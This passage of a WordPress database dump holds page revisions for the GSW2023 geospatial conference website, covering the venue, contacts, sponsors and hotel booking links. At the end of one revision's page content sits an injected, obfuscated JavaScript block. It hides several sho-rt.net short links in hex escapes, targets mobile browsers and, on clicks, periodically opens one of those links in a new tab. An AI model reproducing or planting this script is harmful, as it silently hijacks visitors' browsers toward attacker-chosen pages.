spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-24 23:10:57','2023-05-24 23:10:57','',3066,'https://gsw2023.com/?p=4563',0,'revision','',0),
(4564,1,'2023-05-24 23:11:29','2023-05-24 23:11:29','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305146113{margin-top: 0px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px 